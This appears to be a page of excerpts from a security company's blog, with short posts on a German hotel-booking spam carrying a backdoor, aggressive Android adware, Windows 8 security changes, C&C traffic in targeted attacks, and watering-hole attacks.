The hotel booking spam recently reported has made its way into German users’ inboxes. The email purporting to be from one of the Brenners Park-Hotel and Spa in Austria has a similar theme to its English counterpart as it contains confirmation and details on an alleged booking reservation.

The email sample above was sent to a personal email address of one of Trend Micro’s managers. He almost fell for it, given that he travels a lot – until he noticed the address of the hotel.

It’s too bad the spammers aren’t as good with geography as making spam: the actual Brenners Park-Hotel and Spa is in Baden-Baden Germany and not in Austria. While he was initially looking forward to attending the hotel, having read the excellent reviews on TripAdvisor, the email made it clear that this was, unfortunately, a scam. Good thing though, the attachment was already flagged and detected by Trend Micro as BKDR_ANDROM.P.

Read the rest of this entry »

It has become an inevitable part of the Android user experience that apps will ask for a long laundry list of permissions. Many apps will ask you to grant them network access so they can download updates. Others seek permission to read your phone’s state and identity so calls won’t disrupt them from doing what they’re doing. Unfortunately, these permissions can be abused for criminal intentions.

Rise of Aggresive Mobile Adware

Aside from apps abusing user’s permission, we noted a significant rise in the number of aggressive mobile adware, as reported in our 3Q Threat Roundup Android Under Siege: Popularity Comes at a Price. Trend Micro consider these adware as “high risk”, as they pose serious threat to user’s privacy and serve as effective means to collect data, which can be used for suspicious purposes.

Recently, I was testing Android apps from Google Play and after after a simple typo, I carelessly downloaded a Flash player app. Fortunately, the installed Trend Micro Mobile Security app notified me of a dangerous app.

Read the rest of this entry »

With its launch of Windows 8, Microsoft promises a rejuvenated OS and brand that translate to improved user experience. But when it comes to security, did Microsoft take it up a notch?

Beyond Window 8’s interface and over-all experience, users are also concerned with its resilience against threats. Below are some of my observations on certain security changes that Microsoft implemented on Windows 8.

Windows Defender. Microsoft returns with their full product (previously known as One Care) pre-installed. Windows 7 came with a spyware-only version of Windows Defender (though users could download the free Microsoft Security Essentials for free). Now, though Windows Defender combines both spyware and antivirus capabilities. On retail versions, users have the choice of installing their security product, preferably from the Microsoft App Store. However, if no security product is installed after two-weeks then Windows 8 will activate Windows Defender.

This is a smart decision by Microsoft, as this sidesteps possible legal issues by giving users an opt-in opportunity. For users who may forget to install their favorite security product, Windows Defender provides baseline security level.

Read the rest of this entry »

Today’s successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Though there are a variety of tools available to attackers, they tend to prefer specific ones.

While they can routinely create new malware executables with automated builders and embed them in documents designed to exploit vulnerabilities in popular office software, the traffic generated by the malware when communicating with a C&C server tends to remain consistent.

This is significant because targeted attacks are rarely a “singular set of events,” but are in fact part of ongoing campaigns. They are consistent espionage campaigns—a series of failed and successful attempts to compromise a target over time—that aim to establish a persistent and covert presence in a target network so that information can be extracted when needed.

Read the rest of this entry »

The term “Watering Hole” has become a popular way to describe targeted malware attacks in which the attackers compromise a legitimate website and insert a “drive-by” exploit in order to compromise the website’s visitors. Two recent papers by our friends at RSA and Symantec documented such attacks.

Of course, such attacks are not new. This technique has long been used by indiscriminate cybercriminal attacks as well as targeted malware attacks. I documented the use of such techniques in 2009 and 2010 and there have been more recent cases as well.

While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in relation to APT activity is what Shadowserver aptly described as “strategic web compromises”. The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit.

Read the rest of this entry »